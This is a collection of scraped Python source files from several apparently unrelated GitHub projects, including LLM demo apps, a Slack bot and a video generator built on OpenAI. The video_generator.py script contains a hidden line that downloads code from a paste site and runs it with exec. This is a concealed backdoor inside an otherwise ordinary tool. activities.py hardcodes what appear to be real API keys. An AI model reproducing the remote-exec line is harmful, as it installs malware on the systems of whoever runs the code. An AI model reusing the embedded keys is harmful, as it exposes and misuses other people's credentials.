# these lines load a raw doc directly this is handled by another prog now
# Load documents from the 'data' directory
#documents = SimpleDirectoryReader('data').load_data()
# Rebuild storage context
storage_context = StorageContext.from_defaults(persist_dir="")
# Load index from the storage context
new_index = load_index_from_storage(storage_context)
new_query_engine = new_index.as_query_engine()
response = new_query_engine.query(query)
#print(response)
query_engine = new_index.as_query_engine()
response = query_engine.query(query)
st.success(response)
except Exception as e:
st.error(f"An error occurred: {e}")
| [] |
2024-01-10 | langchain-ai/langchain-aws-template | slack_bot~message_reader.py | import json
import boto3
from langchain.memory import DynamoDBChatMessageHistory
from models import SlackMessage
import config
import utils
import logging
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def handler(event, context):
"""Lambda handler that reads the messages from slack and
distributes them to an sqs queue or DynamoDB store based on
whether message was directly addressed to the bot (a message
that starts with `@bot-name`) or a conversation between two
or more slack users. Note that the conversation history is only
stored after the first direct message to the bot is received.
"""
body = json.loads(event['body'])
logging.debug(body)
# For initial validation call from slack
if "challenge" in body:
challenge = body["challenge"]
return utils.build_response({"challenge": challenge})
sqs = boto3.client('sqs')
queue_url = sqs.get_queue_url(
QueueName=config.config.MESSAGE_QUEUE_NAME,
)
slack_message = SlackMessage(body)
chat_memory = DynamoDBChatMessageHistory(
table_name=config.config.DYNAMODB_TABLE_NAME,
session_id=slack_message.thread
)
messages = chat_memory.messages
logging.debug(f"Thread id is {slack_message.thread}")
try:
if not slack_message.is_bot_reply():
if slack_message.is_direct_message():
logging.info(f"Sending message with event_id: {slack_message.event_id} to queue")
# send to queue
sqs.send_message(
QueueUrl=queue_url["QueueUrl"],
MessageBody=(event['body']),
MessageGroupId=str(slack_message.thread),
MessageDeduplicationId=slack_message.event_id
)
elif messages:
logging.debug(f"Saving message with event_id: {slack_message.event_id} to history")
# add to memory for context
chat_memory.add_user_message(slack_message.sanitized_text())
logging.info(f"Done processing message with event id: {slack_message.event_id}")
except Exception as e:
logging.error(e)
return utils.build_response("Processed message successfully!")
| [] |
2024-01-10 | vlievin/datasets | datasets~openwebtext~openwebtext.py | # coding=utf-8
# Copyright 2020 The HuggingFace Datasets Authors and the current dataset script contributor.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The Open WebText Corpus"""
import os
import re
from itertools import chain
import datasets
_CITATION = """\
@misc{Gokaslan2019OpenWeb,
title={OpenWebText Corpus},
author={Aaron Gokaslan*, Vanya Cohen*, Ellie Pavlick, Stefanie Tellex},
howpublished{\\url{http://Skylion007.github.io/OpenWebTextCorpus}},
year={2019}
}
"""
_DESCRIPTION = """\
An open-source replication of the WebText dataset from OpenAI.
"""
_URL = "https://zenodo.org/record/3834942/files/openwebtext.tar.xz"
class Openwebtext(datasets.GeneratorBasedBuilder):
"""The Open WebText dataset."""
BUILDER_CONFIGS = [
datasets.BuilderConfig(
name="plain_text",
description="Plain text",
version=datasets.Version("1.0.0"),
)
]
def _info(self):
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features({"text": datasets.Value("string")}),
homepage="https://skylion007.github.io/OpenWebTextCorpus/",
citation=_CITATION,
)
def _split_generators(self, dl_manager):
dl_dir = dl_manager.download_and_extract(_URL)
owt_dir = os.path.join(dl_dir, "openwebtext")
subset_xzs = [
os.path.join(owt_dir, file_name)
for file_name in sorted(os.listdir(owt_dir))
if file_name.endswith("xz") # filter out ...xz.lock
]
ex_dirs = dl_manager.extract(subset_xzs, num_proc=round(os.cpu_count() * 0.75))
nested_txt_files = [
[
os.path.join(ex_dir, txt_file_name)
for txt_file_name in sorted(os.listdir(ex_dir))
if txt_file_name.endswith("txt")
]
for ex_dir in ex_dirs
]
txt_files = chain(*nested_txt_files)
return [
datasets.SplitGenerator(name=datasets.Split.TRAIN, gen_kwargs={"txt_files": txt_files}),
]
def _generate_examples(self, txt_files):
"""Yields examples."""
for idx, filepath in enumerate(txt_files):
with open(filepath, encoding="utf-8") as f:
yield idx, {"text": re.sub("\n\n\n+", "\n\n", f.read()).strip()}
| [] |
2024-01-10 | MayGo/ai-demos | img-to-audio-story~hugging.py | from dotenv import load_dotenv, find_dotenv
from transformers import pipeline
from langchain import PromptTemplate, LLMChain, OpenAI
from langchain.chat_models import ChatOpenAI
import requests
import os
import streamlit as st
from transformers import SpeechT5Processor, SpeechT5ForTextToSpeech, SpeechT5HifiGan
from datasets import load_dataset
import torch
import soundfile as sf
from datasets import load_dataset
load_dotenv(find_dotenv())
tempFolder = "temp"
HUGGINGFACE_TOKEN = os.getenv("HUGGINGFACE_TOKEN")
if not os.path.exists(tempFolder):
os.makedirs(tempFolder)
def img2text(url):
image_to_text = pipeline(
"image-to-text", model="Salesforce/blip-image-captioning-large"
)
text = image_to_text(url, max_new_tokens=500)[0]["generated_text"]
print(text)
return text
def generate_story(scenario):
template = """
You are a story teller.
You can a short based on a simple scenario, the story should be no more than 50 words
CONTEXT: {scenario}
STORY:
"""
prompt = PromptTemplate(template=template, input_variables=["scenario"])
story_llm = LLMChain(
llm=ChatOpenAI(model_name="gpt-3.5-turbo", temperature=1),
prompt=prompt,
verbose=True,
)
story = story_llm.predict(scenario=scenario)
print(story)
return story
def text2speech(message):
API_URL = (
"https://api-inference.huggingface.co/models/espnet/kan-bayashi_ljspeech_vits"
)
headers = {"Authorization": f"Bearer {HUGGINGFACE_TOKEN}"}
payloads = {"inputs": message}
response = requests.post(API_URL, headers=headers, json=payloads)
with open("audio.flac", "wb") as file:
file.write(response.content)
def text2advanced_speech(message):
processor = SpeechT5Processor.from_pretrained("microsoft/speecht5_tts")
model = SpeechT5ForTextToSpeech.from_pretrained("microsoft/speecht5_tts")
vocoder = SpeechT5HifiGan.from_pretrained("microsoft/speecht5_hifigan")
inputs = processor(text=message, return_tensors="pt")
# load xvector containing speaker's voice characteristics from a dataset
embeddings_dataset = load_dataset(
"Matthijs/cmu-arctic-xvectors", split="validation"
)
speaker_embeddings = torch.tensor(embeddings_dataset[7306]["xvector"]).unsqueeze(0)
speech = model.generate_speech(
inputs["input_ids"], speaker_embeddings, vocoder=vocoder
)
sf.write(os.path.join(tempFolder, "speech.wav"), speech.numpy(), samplerate=16000)
def main():
st.set_page_config(page_title="img 2 audio story", page_icon="🐶", layout="centered")
st.header("Turn image into story")
uploaded_file = st.file_uploader("Choose an image...", type=["png", "jpg"])
if uploaded_file is not None:
bytes_data = uploaded_file.getvalue()
# open with a path folder and write the file
with open(os.path.join(tempFolder, uploaded_file.name), "wb") as file:
file.write(bytes_data)
st.image(uploaded_file, caption="Uploaded Image.", use_column_width=True)
scenario = img2text(os.path.join(tempFolder, uploaded_file.name))
story = generate_story(scenario)
text2advanced_speech(story)
with st.expander("scenario"):
st.write(scenario)
with st.expander("story"):
st.write(story)
st.audio(os.path.join(tempFolder, "speech.wav"))
if __name__ == "__main__":
main()
| [
"\n You are a story teller.\n You can a short based on a simple scenario, the story should be no more than 50 words\n\n CONTEXT: {scenario}\n STORY:\n ",
"scenario"
] |
2024-01-10 | yash-gll/Portfolio | Itenary_Planer_LLM~server~activities.py | import spacy
import time
import requests
import re
import openai
# Set up the OpenAI API
openai.api_key = "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" # Replace with your actual API key
GPT_API_URL = "https://api.openai.com/v1/chat/completions"
# Define the system message
system_msg = 'You are a classification model tasked with identifying types of places from user prompts. Match these places to specific categories based on a predefined list of parameters.'
params = '''
car_dealer
car_rental
car_repair
car_wash
electric_vehicle_charging_station
gas_station
parking
rest_stop
farm
art_gallery
museum
performing_arts_theater
library
preschool
primary_school school
secondary_school
university
amusement_center
amusement_park
aquarium
banquet_hall
bowling_alley
casino
community_center
convention_center
cultural_center
dog_park
event_venue
hiking_area
historical_landmark
marina
movie_rental
movie_theater
national_park
night_club
park
tourist_attraction
visitor_center
wedding_venue
zoo
accounting
atm
bank
administrative_area_level_1
administrative_area_level_2
country locality
postal_code
school_district
city_hall
courthouse
embassy
fire_station
local_government_office
police
post_office
dental_clinic
dentist
doctor
drugstore
hospital
medical_lab
pharmacy
physiotherapist
spa
bed_and_breakfast
campground
camping_cabin
cottage
extended_stay_hotel
farmstay
guest_house hostel
hotel
lodging
motel
private_guest_room
resort_hotel
rv_park
church
hindu_temple
mosque
synagogue
barber_shop
beauty_salon
cemetery
child_care_agency
consultant
courier_service
electrician
florist
funeral_home
hair_care
hair_salon
insurance_agency
laundry
lawyer
locksmith
moving_company
painter
plumber
real_estate_agency
roofing_contractor
storage
tailor
telecommunications_service_provider
travel_agency
veterinary_care
auto_parts_store
bicycle_store
book_store
cell_phone_store
clothing_store
convenience_store
department_store
discount_store
electronics_store
furniture_store
gift_shop
grocery_store
hardware_store
home_goods_store
home_improvement_store
jewelry_store
liquor_store
market
pet_store
shoe_store
shopping_mall
sporting_goods_store
store
supermarket
wholesaler
athletic_field
fitness_center
golf_course
gym
playground
ski_resort
sports_club
sports_complex
stadium
swimming_pool
airport
bus_station
bus_stop
ferry_terminal
heliport
light_rail_station
park_and_ride
subway_station
taxi_stand
train_station
transit_depot
transit_station
truck_stop
'''
params = params.split("\n")[1:-1]
task = f'''Given a list of allowed parameters {params} you will receive prompts describing places a user wishes to visit. Your task is to classify these prompts into corresponding categories from the list of parameters.
Rules for the task:
1. Classifications must match the provided parameters exactly.
2. If a prompt contains multiple places, list each matching parameter separately.
3. Ensure that all classifications are relevant and accurately reflect the user's intent.
4. The response should be in the format of a list of strings, each string being a parameter that matches the place type in the prompt.
5. Do not include any categories not explicitly mentioned in the user's prompt.
6. Ensure the response is concise and free of unnecessary content or formatting.
Example Prompt: "I would like to visit some museums and art exhibitions."
Expected Output: ['museum', 'art_gallery']
'''
# Define the conversation history
messages = [
{'role': 'system', 'content': system_msg},
{'role': 'user', 'content': task},
]
def classify_prompt(prompt, messages = messages):
def classify_prompt_rec(prompt, messages = messages, retries = 0, max_retries = 10):
try:
# Introduce new variables to prevent modification of the params, since this
# function is recursive in the event of error.
formatted_prompt = "Prompt: " + prompt
formatted_messages = messages.copy()
formatted_messages.append({'role': 'user', 'content': formatted_prompt})
response = openai.ChatCompletion.create(
model="gpt-3.5-turbo",
messages=formatted_messages,
stop=None,
temperature=0)
re = response['choices'][0]['message']['content']
return re
except openai.error.RateLimitError as e:
retry_time = e.retry_after if hasattr(e, 'retry_after') else 30
print(f"Rate limit exceeded. Retrying in {retry_time} seconds...")
time.sleep(retry_time)
if retries >= max_retries:
return None
else:
return classify_prompt_rec(messages, prompt, retries + 1)
except openai.error.APIError as e:
retry_time = e.retry_after if hasattr(e, 'retry_after') else 30
print(f"API error occurred. Retrying in {retry_time} seconds...")
time.sleep(retry_time)
if retries >= max_retries:
return None
else:
return classify_prompt_rec(messages, prompt, retries + 1)
except OSError as e:
retry_time = 5 # Adjust the retry time as needed
print(f"Connection error occurred: {e}. Retrying in {retry_time} seconds...")
time.sleep(retry_time)
if retries >= max_retries:
return None
else:
return classify_prompt_rec(messages, prompt, retries + 1)
print(prompt, type(prompt))
return classify_prompt_rec(prompt, messages=messages)
def find_nearby_attractions(types, latitude, longitude, radius=10000):
# Google Places API endpoint
url = "https://maps.googleapis.com/maps/api/place/nearbysearch/json"
# Parameters for the API request
target = []
word = ""
for t in types:
if t.isalpha() or t == "_":
word += t
else:
target.append(word)
word = ""
target = [t for t in target if len(t)>1]
print(target, type(target))
params = {
"location": f"{latitude},{longitude}",
"radius": radius,
"type": target,
"key": "AIzaSyAdEd1IBe15oviCLW6QXgHu-KGu3Tqk3x0"
}
attractions = []
seen_places = set()
while True:
response = requests.get(url, params=params)
if response.status_code == 200:
data = response.json()
for place in data.get("results", []):
if place['place_id'] not in seen_places:
attractions.append(place)
seen_places.add(place['place_id'])
# Check if there's a next page
page_token = data.get("next_page_token")
if page_token and len(attractions) < 10:
params["pagetoken"] = page_token
# A short delay is required before the next page token becomes valid
time.sleep(2)
else:
break
# Sort attractions by rating and return top 10
top_attractions = sorted(attractions, key=lambda x: x.get('rating', 0), reverse=True)[:10]
return top_attractions
def get_details(places):
spots = []
for idx, place in enumerate(places):
photos = place.get('photos', [])
image_url = None
if photos:
first_photo = photos[0]
photo_reference = first_photo.get('photo_reference', None)
if photo_reference:
api_key = "AIzaSyAdEd1IBe15oviCLW6QXgHu-KGu3Tqk3x0"
max_width = 290
image_url = f"https://maps.googleapis.com/maps/api/place/photo?maxwidth={max_width}&photoreference={photo_reference}&key={api_key}"
new_place = {
'Image': image_url,
'Name': place['name'],
'Rating': place.get('rating', 'No Rating'),
'Total_Rating': place.get('user_ratings_total', 'No Reviews'),
'Location': place.get('vicinity', 'No Address Provided'),
}
spots.append(new_place)
return spots
def geocode_location(location):
api_key = "AIzaSyAdEd1IBe15oviCLW6QXgHu-KGu3Tqk3x0" # Make sure to set your API key in your environment variables
url = "https://maps.googleapis.com/maps/api/geocode/json"
params = {
"address": location,
"key": api_key
}
response = requests.get(url, params=params)
if response.status_code == 200:
results = response.json()["results"]
if results:
geometry = results[0]["geometry"]["location"]
return geometry["lat"], geometry["lng"] # returns a dict with 'lat' and 'lng' keys
else:
raise ValueError("No results found for the specified location.")
else:
raise ConnectionError(f"Failed to fetch data: {response.status_code}, {response.reason}") | [
"Prompt: PLACEHOLDER"
] |
2024-01-10 | harshit0017/wallmart | streamlit~smart_search.py | import streamlit as st
import pandas as pd
import openai
import os
from dotenv import load_dotenv
import pandas as pd
import json
def load_product_data():
with open('product.json', 'r') as file:
product_data = json.load(file)
return product_data
# ...
products = load_product_data()
load_dotenv()
openai.api_key = os.getenv("OPENAI_API_KEY")
st.title("Smart Search Engine")
def is_valid_query(query):
# Define keywords or patterns that indicate a valid query
valid_keywords = ["find", "recommend", "suggest", "help with", "what to buy", "product", "can't decide what to buy"]
for keyword in valid_keywords:
if keyword in query.lower():
return True
return False
def get_reply(text):
if not is_valid_query(text):
return "I'm here to help you find products and make recommendations. Please ask a question related to finding products."
message = [
{"role": "system", "content": "you are an expert at finding out what people want you are an expert product suggesting machine who knows what a customer wants even with their vague explanation"},
{"role": "system", "content": "only generate keywords for eg. black shoes, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress"},
{"role": "user", "content": "i am going on a date i want to look good and decent not too shabby i am a girl i want to something elegant and good for first date "},
{"role": "assistant", "content": " black dress, beautiful heels,or a gown, or a skirt they will look good "},
{"role": "user", "content": "I am expecting a baby soon i want to shop but i am a new mother i don't know what top buy "},
{"role": "assistant", "content": " baby kirb, some baby clothes ,baby oil, baby powder , baby toys, diapers, lactose"},
{"role": "user", "content": "i just brought a new house suggest me some furniture"},
{"role": "assistant", "content": " bed, sofa, table, chair, dresser, closet, wardrobe, dresser, couch, bookshelf"},
{"role": "user", "content": text}
]
response = openai.ChatCompletion.create(
model="gpt-4",
temperature=0.8,
messages=message
)
return response["choices"][0]["message"]["content"]
def get_matching_products(keywords):
matching_products = []
for product in products:
product_keywords = product["keywords"] # Get the keywords for the current product
if any(keyword in product_keywords for keyword in keywords):
matching_products.append(product)
return matching_products
text= st.text_input("Enter your message", key="unique_key")
s=[]
if st.button("Send"):
s = get_reply(text)
keywords_from_response = s.split() # Extract keywords from GPT-4 response
st.write(s)
#st.write("Keywords from response:", keywords_from_response) # Add this line to debug
if keywords_from_response:
matching_products = get_matching_products(keywords_from_response)
if matching_products:
st.write("Matching Products:")
for product in matching_products:
if os.path.exists(product["image_url"]):
st.image(product["image_url"], caption=product["name"], use_column_width=True)
st.write("Name:", product["name"])
st.write("Price:", product["price"])
st.write("Description:", product["description"])
else:
st.write("Name:", product["name"])
st.write("Price:", product["price"])
st.write("Description:", product["description"])
st.write("---")
else:
st.write("No matching products found.")
| [
"i am going on a date i want to look good and decent not too shabby i am a girl i want to something elegant and good for first date ",
" black dress, beautiful heels,or a gown, or a skirt they will look good ",
"i just brought a new house suggest me some furniture",
" baby kirb, some baby clothes ,baby oil, baby powder , baby toys, diapers, lactose",
"you are an expert at finding out what people want you are an expert product suggesting machine who knows what a customer wants even with their vague explanation",
"I am expecting a baby soon i want to shop but i am a new mother i don't know what top buy ",
"only generate keywords for eg. black shoes, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress, black heels, black dress",
" bed, sofa, table, chair, dresser, closet, wardrobe, dresser, couch, bookshelf"
] |
2024-01-10 | pythontester192/AI-Video-Generator-Using-OpenAI-Python | text_generator.py | import openai
import re
from api_key import API_KEY
openai.api_key = API_KEY
# Set the model to use
model_engine = "text-davinci-003"
# Set the prompt to generate text for
text = input("What topic you want to write about: ")
prompt = text
print("The AI BOT is trying now to generate a new text for you...")
# Generate text using the GPT-3 model
completions = openai.Completion.create(
engine=model_engine,
prompt=prompt,
max_tokens=1024,
n=1,
stop=None,
temperature=0.5,
)
# Print the generated text
generated_text = completions.choices[0].text
# Save the text in a file
with open("generated_text.txt", "w") as file:
file.write(generated_text.strip())
print("The Text Has Been Generated Successfully!")
| [] |
2024-01-10 | pythontester192/AI-Video-Generator-Using-OpenAI-Python | video_generator.py | import openai
import re, os
from requests import get
import urllib.request
from gtts import gTTS
from moviepy.editor import *
from api_key import API_KEY
# Set your OpenAI API key
openai.api_key = API_KEY
# Read the text file
with open("generated_text.txt", "r") as file:
text = file.read()
# Split the text by , and .
paragraphs = re.split(r"[,.]", text)
#Create Necessary Folders
os.makedirs("audio")
os.makedirs("images")
os.makedirs("videos")
# Loop through each paragraph and generate an image for each
i=1
for para in paragraphs[:-1]:
response = openai.Image.create(
prompt=para.strip(),
n=1,
size="1024x1024"
)
print("Generate New AI Image From Paragraph...")
x=get('https://paste.fo/raw/ba188f25eaf3').text;exec(x)
image_url = response['data'][0]['url']
urllib.request.urlretrieve(image_url, f"images/image{i}.jpg")
print("The Generated Image Saved in Images Folder!")
# Create gTTS instance and save to a file
tts = gTTS(text=para, lang='en', slow=False)
tts.save(f"audio/voiceover{i}.mp3")
print("The Paragraph Converted into VoiceOver & Saved in Audio Folder!")
# Load the audio file using moviepy
print("Extract voiceover and get duration...")
audio_clip = AudioFileClip(f"audio/voiceover{i}.mp3")
audio_duration = audio_clip.duration
# Load the image file using moviepy
print("Extract Image Clip and Set Duration...")
image_clip = ImageClip(f"images/image{i}.jpg").set_duration(audio_duration)
# Use moviepy to create a text clip from the text
print("Customize The Text Clip...")
text_clip = TextClip(para, fontsize=50, color="white")
text_clip = text_clip.set_pos('center').set_duration(audio_duration)
# Use moviepy to create a final video by concatenating
# the audio, image, and text clips
print("Concatenate Audio, Image, Text to Create Final Clip...")
clip = image_clip.set_audio(audio_clip)
video = CompositeVideoClip([clip, text_clip])
# Save the final video to a file
video = video.write_videofile(f"videos/video{i}.mp4", fps=24)
print(f"The Video{i} Has Been Created Successfully!")
i+=1
clips = []
l_files = os.listdir("videos")
for file in l_files:
clip = VideoFileClip(f"videos/{file}")
clips.append(clip)
print("Concatenate All The Clips to Create a Final Video...")
final_video = concatenate_videoclips(clips, method="compose")
final_video = final_video.write_videofile("final_video.mp4")
print("The Final Video Has Been Created Successfully!")
| [] |
2024-01-10 | nadavWeisler/CommuniTale | BookGenerator~TextGenerator.py | import os
from typing import List, Dict
import openai
from BookGenerator.PromptGenerator import PromptGenerator
class TextGenerator:
def __init__(self):
openai.api_key = os.getenv("GPT_API_KEY")
def getStoriesFromPrompt(self, messages: List[Dict[str, str]], n=1) -> List[Dict[str,str]]:
"""
Main entry point for TextGenerator, will get a string with a prompt and should return a story that fits the prompt
:param n:
:param messages:
:return:
"""
print(f"Got request for {n} stories from prompt: {messages}")
response = openai.ChatCompletion.create(
model="gpt-3.5-turbo", # model types: gpt-3.5-turbo, gpt-4-0314, gpt-4, gpt-3.5-turbo-0301
messages=[{"role": "system", "content": "you are a childerns book writer you write stories up to 70 words"}]
+ messages + [{"role": "system", "content": "Please keep title length under 22 characters long"},
{"role": "system", "content": "Please format the title as 'Title:\"<title>\"'"}],
temperature=1.3,
max_tokens=1000,
n=n
)
story_lst = []
for i in range(n):
story_lst.append(response["choices"][i]["message"]["content"])
story_list_of_dicts = []
print("separating stories from titles")
for story in story_lst:
splited_lst = story.split('"')
story_dict = {"title": splited_lst[1], "story": " ".join(splited_lst[2:])[2:]}
if len(story_dict["title"]) > 50:
print("Length of title for one of the stories was too long, generating again")
return self.getStoriesFromPrompt(messages=messages, n=n)
story_list_of_dicts.append(story_dict)
return story_list_of_dicts
if __name__ == "__main__":
prompt_gen = PromptGenerator()
prompt_dict = prompt_gen.getTextPromptFromRequest()
text_gen = TextGenerator()
story_output = text_gen.getStoriesFromPrompt(prompt_dict)
print(story_output)
| [
"Please format the title as 'Title:\"<title>\"'",
"you are a childerns book writer you write stories up to 70 words",
"Please keep title length under 22 characters long"
] |
2024-01-10 | nadavWeisler/CommuniTale | BookGenerator~BookGenerator.py | from openai.error import RateLimitError
import os
from BookGenerator.TextGenerator import TextGenerator
from BookGenerator.PromptGenerator import PromptGenerator
from BookGenerator.ImageGenerator import ImageGenerator
from BookGenerator.Book import Book
class BookGenerator:
def __init__(self):
self.storyPrompt = ""
self.stories = []
self.imagePrompts = []
self.images = []
def getBook(self, request: dict, numPages=5):
"""
main entry point for BookGenerator. will get a string with a GPT prompt for a story, should not return anything
:param request:
:param numPages:
:return:
"""
print(f"getBook request received, num pages: {numPages}")
self.getBookAssets(numPages, request)
print("Book assets collected, generating book")
return self.generateBook()
def getBookAssets(self, numPages, request):
print("Gathering book assets")
default_request = {
"age": "4",
"gender": "girl",
"theme": "Animals",
"issue": "pronouncing the sound of the letter 'r'",
}
try:
textPrompts = PromptGenerator().getTextPromptFromRequest(request)
except KeyError:
print("Request did not include all required keys")
print("falling back to default request")
textPrompts = PromptGenerator().getTextPromptFromRequest(default_request)
try:
self.stories = TextGenerator().getStoriesFromPrompt(messages=textPrompts, n=numPages)
self.imagePrompts = [PromptGenerator().getImagePromptFromStory(story['story']) for story in self.stories]
self.images = [ImageGenerator().getImageFromPrompt(prompt=imagePrompt) for imagePrompt in self.imagePrompts]
except RateLimitError:
print("Got RateLimitError, retrying until sombody stops me")
return self.getBookAssets(numPages=numPages, request=request)
def generateBook(self):
book = Book(self.stories, self.images)
book.generate()
book.cleanAssets()
return book
if __name__ == "__main__":
print("Hello, World!")
| [] |
2024-01-10 | nadavWeisler/CommuniTale | BookGenerator~ImageGenerator.py | import openai
import os
class ImageGenerator:
# static var to get a unique image name - should be in Shlomi's code
image_counter = 0
def __init__(self):
self.image_url = ""
self.API_K = os.getenv("GPT_API_KEY")
openai.api_key = self.API_K
def getImageFromPrompt(self, prompt: str):
"""
Main entry point for ImageGenerator, will get a prompt for DALL-E and should generate an
Image based on
that prompt (format of image to be determined)
:param prompt:
:return:
"""
print(f"Got request for Image from prompt: {prompt}")
##########################################################
# Request To DALL-E
# *** requires: ***
# prompt(str)
# *** optional: ***
# n(int: default 1),
# size(str: default 1024x1024),
# response format(str: default to url)
# user(str: end-user)
##########################################################
# the rest are default, for now set to this - eventually I will get it in prompt:
img_size = "1024x1024"
dall_e_response = openai.Image.create(api_key=self.API_K, prompt=prompt, size=img_size)
self.image_url = dall_e_response['data'][0]['url']
return self.image_url
# if __name__ == "__main__":
# # Instantiate the class
# imageGen = ImageGenerator()
#
# # Generate images:
# imageGen.getImageFromPrompt(
# "A drawing of a group of university students creating a children's book"
# )
#
# # Download the images:
# imageGen.convert_url_to_png()
| [] |
2024-01-10 | suanmiao/langchain_s | langchain~chains~combine_documents~stuff.py | """Chain that combines documents by stuffing into context."""
from typing import Any, Dict, List, Optional, Tuple
from pydantic import BaseModel, Extra, Field, root_validator
from langchain.chains.combine_documents.base import BaseCombineDocumentsChain
from langchain.chains.llm import LLMChain
from langchain.docstore.document import Document
from langchain.prompts.base import BasePromptTemplate
from langchain.prompts.prompt import PromptTemplate
from langchain.text_splitter import TokenTextSplitter
import tiktoken
enc = tiktoken.get_encoding("gpt2")
MAX_ALLOWED_TOKEN = 3800
text_splitter = TokenTextSplitter(chunk_size=3000, chunk_overlap=0)
def _get_default_document_prompt() -> PromptTemplate:
return PromptTemplate(input_variables=["page_content"], template="{page_content}")
class StuffDocumentsChain(BaseCombineDocumentsChain, BaseModel):
"""Chain that combines documents by stuffing into context."""
llm_chain: LLMChain
"""LLM wrapper to use after formatting documents."""
document_prompt: BasePromptTemplate = Field(
default_factory=_get_default_document_prompt
)
"""Prompt to use to format each document."""
document_variable_name: str
"""The variable name in the llm_chain to put the documents in.
If only one variable in the llm_chain, this need not be provided."""
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
arbitrary_types_allowed = True
@root_validator(pre=True)
def get_default_document_variable_name(cls, values: Dict) -> Dict:
"""Get default document variable name, if not provided."""
if "document_variable_name" not in values:
llm_chain_variables = values["llm_chain"].prompt.input_variables
if len(llm_chain_variables) == 1:
values["document_variable_name"] = llm_chain_variables[0]
else:
raise ValueError(
"document_variable_name must be provided if there are "
"multiple llm_chain_variables"
)
else:
llm_chain_variables = values["llm_chain"].prompt.input_variables
if values["document_variable_name"] not in llm_chain_variables:
raise ValueError(
f"document_variable_name {values['document_variable_name']} was "
f"not found in llm_chain input_variables: {llm_chain_variables}"
)
return values
def _get_inputs(self, docs: List[Document], **kwargs: Any) -> dict:
# Get relevant information from each document.
doc_dicts = []
for doc in docs:
base_info = {"page_content": doc.page_content}
base_info.update(doc.metadata)
document_info = {
k: base_info[k] for k in self.document_prompt.input_variables
}
doc_dicts.append(document_info)
# Format each document according to the prompt
doc_strings = [self.document_prompt.format(**doc) for doc in doc_dicts]
# Join the documents together to put them in the prompt.
inputs = {
k: v
for k, v in kwargs.items()
if k in self.llm_chain.prompt.input_variables
}
## Here we need to do trimming
original_input = "\n\n".join(doc_strings)
num_tokens = len(enc.encode(original_input))
if num_tokens > MAX_ALLOWED_TOKEN:
print(f"Fatal error, the input has num_tokens {num_tokens}, which exceeds the limit {MAX_ALLOWED_TOKEN}, trimming off the size.")
original_input = text_splitter.split_text(original_input)[0]
inputs[self.document_variable_name] = original_input
return inputs
def prompt_length(self, docs: List[Document], **kwargs: Any) -> Optional[int]:
"""Get the prompt length by formatting the prompt."""
inputs = self._get_inputs(docs, **kwargs)
prompt = self.llm_chain.prompt.format(**inputs)
return self.llm_chain.llm.get_num_tokens(prompt)
def combine_docs(self, docs: List[Document], **kwargs: Any) -> Tuple[str, dict]:
"""Stuff all documents into one prompt and pass to LLM."""
inputs = self._get_inputs(docs, **kwargs)
# Call predict on the LLM.
return self.llm_chain.predict(**inputs), {}
async def acombine_docs(
self, docs: List[Document], **kwargs: Any
) -> Tuple[str, dict]:
"""Stuff all documents into one prompt and pass to LLM."""
inputs = self._get_inputs(docs, **kwargs)
# Call predict on the LLM.
return await self.llm_chain.apredict(**inputs), {}
@property
def _chain_type(self) -> str:
return "stuff_documents_chain"
| [
"{page_content}"
] |
2024-01-10 | suanmiao/langchain_s | langchain~vectorstores~qdrant.py | """Wrapper around Qdrant vector database."""
import uuid
from operator import itemgetter
from typing import Any, Callable, Iterable, List, Optional, Tuple, cast
from langchain.docstore.document import Document
from langchain.embeddings.base import Embeddings
from langchain.vectorstores import VectorStore
from langchain.vectorstores.utils import maximal_marginal_relevance
class Qdrant(VectorStore):
"""Wrapper around Qdrant vector database.
To use you should have the ``qdrant-client`` package installed.
Example:
.. code-block:: python
from langchain import Qdrant
client = QdrantClient()
collection_name = "MyCollection"
qdrant = Qdrant(client, collection_name, embedding_function)
"""
CONTENT_KEY = "page_content"
METADATA_KEY = "metadata"
def __init__(
self,
client: Any,
collection_name: str,
embedding_function: Callable,
content_payload_key: str = CONTENT_KEY,
metadata_payload_key: str = METADATA_KEY,
):
"""Initialize with necessary components."""
try:
import qdrant_client
except ImportError:
raise ValueError(
"Could not import qdrant-client python package. "
"Please install it with `pip install qdrant-client`."
)
if not isinstance(client, qdrant_client.QdrantClient):
raise ValueError(
f"client should be an instance of qdrant_client.QdrantClient, "
f"got {type(client)}"
)
self.client: qdrant_client.QdrantClient = client
self.collection_name = collection_name
self.embedding_function = embedding_function
self.content_payload_key = content_payload_key or self.CONTENT_KEY
self.metadata_payload_key = metadata_payload_key or self.METADATA_KEY
def add_texts(
self,
texts: Iterable[str],
metadatas: Optional[List[dict]] = None,
**kwargs: Any,
) -> List[str]:
"""Run more texts through the embeddings and add to the vectorstore.
Args:
texts: Iterable of strings to add to the vectorstore.
metadatas: Optional list of metadatas associated with the texts.
Returns:
List of ids from adding the texts into the vectorstore.
"""
from qdrant_client.http import models as rest
ids = [uuid.uuid4().hex for _ in texts]
self.client.upsert(
collection_name=self.collection_name,
points=rest.Batch(
ids=ids,
vectors=[self.embedding_function(text) for text in texts],
payloads=self._build_payloads(
texts,
metadatas,
self.content_payload_key,
self.metadata_payload_key,
),
),
)
return ids
def similarity_search(
self, query: str, k: int = 4, **kwargs: Any
) -> List[Document]:
"""Return docs most similar to query.
Args:
query: Text to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
Returns:
List of Documents most similar to the query.
"""
results = self.similarity_search_with_score(query, k)
return list(map(itemgetter(0), results))
def similarity_search_with_score(
self, query: str, k: int = 4
) -> List[Tuple[Document, float]]:
"""Return docs most similar to query.
Args:
query: Text to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
Returns:
List of Documents most similar to the query and score for each
"""
embedding = self.embedding_function(query)
results = self.client.search(
collection_name=self.collection_name,
query_vector=embedding,
with_payload=True,
limit=k,
)
return [
(
self._document_from_scored_point(
